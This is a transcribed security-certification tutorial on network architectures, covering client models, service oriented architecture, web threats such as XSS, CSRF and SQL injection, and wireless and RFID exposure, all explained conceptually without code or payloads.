CSSLP Tutorial: Module 03,Part 05 – Common Network Architectures

Common Architectures

In this section, we are going to discuss security and common network architectures that are currently being used.  Major concepts will include: centralized versus distributed computing, some ideas behind service oriented architecture, rich internet application, ubiquitous computing, and cloud architecture. Centralized computing is a bit of an older idea but we’ll use it for comparison. Service oriented architecture has a lot of ideas associated with it.  Internet rich applications are important for increasing functionality. Ubiquitous computing is seen best in action with a variety of examples. That will be discussed as many examples can be demonstrated. There is also the cloud architecture, which as the last subject, isn’t actually discussed here.  It will be discussed in the next section more fully.

Used to be that everyone had dumb terminals on their desktops controlled by a centralized main controller like one of those huge mainframe types. This type of centralization is known as the thin client..  So, from that model, we moved on to a more distributed environment, where each user has their own processing unit at their desktops. This is known as having a fat client.  So, comparing the two different systems, will be the main part of this discussion. So, back in history perhaps 10-15 years, there was setups where there was a main controller in the huge main frame type computer.  The main frame did all the work, all the processing, all the effort.  Then, on each client’s desktops were dumb terminals.   This centralized system gives us the ultimate in thin client terminals. With the thin clients, there is a low functionality. 

Apart from the mainframe, the terminal cannot import, export any information. There are no drives and no operating system to allow for these functions.  There’s a very low hardware requirement.  So, we went from this centralized type of computing system to a more distributed system where there’s powerful machines on each client’s desktop. Rather than being dumb terminals, each one of the machines has drives for importing, export and can do high level functions. However, the problem is that these machines are about two grand per one and if you have say, 200 employees or those who would be using that type of computing systems, then it can get quite expensive. Not only for the initial purchases, but also for the maintenance costs.  They have to be upgraded every three years, as rule of thumb and so then in some cases having to replace the machine completely. Here’s where the benefit of centralized computing comes into play, because the thin client isn’t so expensive and so it saves the organization money. However, the fat clients are much better for any of the exporting or inputting media or information.  So, this is the better security route.  It is also more beneficial with the client server environments, with respect to scalability/  The client server environment  is very easy to add hosts to it, and can hold a large environment.

There are several considerations into building that client server design. Usually, client server is a very centralized environment.  So, first  is the maintenance of the servers.  We create our policies on the server, the main controller and then when the user logs in to the main controller, then they get the policy.  This centralization is easy to secure and manage.  But, it hasn’t always been this easy to manage. Prior to client server environment, there was peer to peer networks with file sharing.  Perhaps one of the most well known was nabster.  In this peer to peer sharing, get both kinds of distributed computing.  First, there’s the distributive because of end user to end user, they share files.  Also, is somewhat centralized and then cuts down on our efforts and thus is easier to secure and manage. So, has aspects of both kinds of distributing computing.  This was the compromise prior to the service oriented architecture. 

The service oriented architecture goes back into the idea of modularization.  Instead of an application that does everything, we want where each module performs a particular service, or where it has a terms of service.  Each module performing a particular service to where it can be used again and again and again and in different contexts. So, this architecture is a much more efficient means of development. It’s  a much more vendor neutral type of service. There is integration or communication among multiple vendors because we’re using neutral services.  So, under service oriented architecture, there are several foundational ideas.  For example, loose coupling, abstraction, composable, reusable, autonomous, discoverable and so on.  Loose coupling means that the individual modules are independent from each other. They don’t have to rely on other modules, and rather have a certain degree of independence.  Abstraction is when these objects perform a specific, particular function and are not concerned with how any of the other details of how the other stuff works.  Service oriented architecture is more about having vendor-neutral network of communication and functionality that’s reusable and modular in design.

With the different applications, ones that we could look at are those which have their richness through internet.  Web applications increases additional functionality of our terminals. The terminals, with the high power machines in today’s offices and that higher degree of interaction as well as functionality, then also have a higher attack surface.  There are two sides of attacks when dealing with web page applications.  They are client side threats and server side threats.  Client side threats are like cross site scripting, and the “C-Surf” attack or CSRF. It’s a cross-site request forgery and it’s sometimes pronounced as C – surf.  With the cross-site scripting, is that an attacker would take advantage of a trusted website which doesn’t require a place to input proper validation. So, injection of code is really easy when the website doesn’t have this process. What they are looking to do is to trick the user to go to a website that has malicious code which wraps around the browser.  The cross-site script takes advantage of my trust for a website.

On the other hand, a CSRF takes an advantage of a website’s trust in me.  For example, when you establish a connection to a website, there’s information about every session and a session ID dealing with when you access the site.   There’s  an opportunity for someone who can possibly compromise the session ID and use that information maliciously.  This is where sometimes the link in the email comes into play, whereas the email may look official but it’s not actually from the actual organization.  They may even phone call you to have you log into your website and when you click on the link in the email or other website they’ve instructed  you to go to, then you’ve launched an application that can be malicious or viral.  That application then also could steal the cookies and other session information.  The information could be unencrypted or stored with encryption,  it actually doesn’t matter because the information is just used rather than trying to figure out the sequence, anyway.   With cross-site request forgery, I’m going to steal that authentication to impersonate a real user.

So many of our applications require user input. Whether it’ s username, password, city/ state/ address, I may be asking you for customer satisfaction feedback whatever that may be and we’re soliciting that information through public forums. This information could be prompted by a fake customer survey. When this happens, the website application can eventually go into the back end database of the machine and if it can enter the database, then it can be process by the database. What we want to make sure that no one’s entering commands like droptable into my database. There’s no person out there whose name is going to be “Johnny Droptable”.  So, we have to cleanse our data and we have to make sure that the data is inspected. We want to validate and make sure that there is no data control language is being entered. We do that through an interface.  The interface funnel is what allows the untrusted users away from your protected resources.   There is a common gateway (CGI interface) script which watches out for and inspects any possible server side threats.

Other possible threats against a server are dealing with aggregation, inferences and polyinstatiation.  Aggregation is when the information is collected or accumulated altogether. Then inferences are when the next step is taken, and some assumptions are made about the information the application or person is wanting to tamper with.  So, a way to prevent the aggregation and the inferential threats is by masking information. For example, instead of showing the password, having asterisks.  In place of the actual social security number, having other symbols possibly with just the last four digits showing.  So, masking is a great way to prevent the threats caused by aggregation and inferences.  

Polyinstatiation, however, is basically  a really big word for lie.  When something has top level security, rather than identifying the file as such, could easily label the file something boring that lower classification people wouldn’t be able to see. That way, there is a prevention of someone having access to sensitive information.  For example, as a person who doesn’t have the classification, logs into a database, there is a shipment marked as food for India and so it doesn’t seem interesting. However, if a person with top level or top secret security clearance, logs in to the same database, they will see instead that the file actually is a list of munitions being shipped to help in an area under siege. So, it’s a preventative to keep those who don’t have the level from being curious and peaking, if you will.  There’s a number of client side threats.

On the other hand, the threats to the server can be done by running a script on our system, when we go to a webpage.  The different ones can be javascript or ActiveX  controls  which are both very very powerful.  When we thought we visited a trusted website, instead we allow scripts to run our system which could essentially pose a threat.

There is wireless technology everywhere you look.  It can be found whenever people are communicating or anytime that information is being transferred over. For example, it’s in our vehicles as part of the controls.There also can be some of this ubiquitous computing in pacemakers and other medical devices associated with health care needs.  Wireless networking in restaurants, coffee shops, cyber cafe all of these variety of places allows for the potential for eavesdropping or manipulation of some kind. 

There’s the radio frequency ID (or RFID) which is found in the chips on credit cards, or on the passports in the sleeve of the little booklet is a chip with the person’s specific information.  There’s the FRID on the chips of the transponders of the highway “Easy Pass” or tollbooth. The near field communications (NFC) are becoming very popular.   For example, they can be used in the hotel and rather than trying to swipe the keycard, instead just holding it near the pad, allows the keycard to unlock the door.  Location based services  like the GPS in the car where there’s all kind of computing going on in the world today.  This is discussed here at this point because again, any time your machine makes a connection, there are possibilities for vulnerabilities.  The last subject under cloud architecture will be studied in the next section.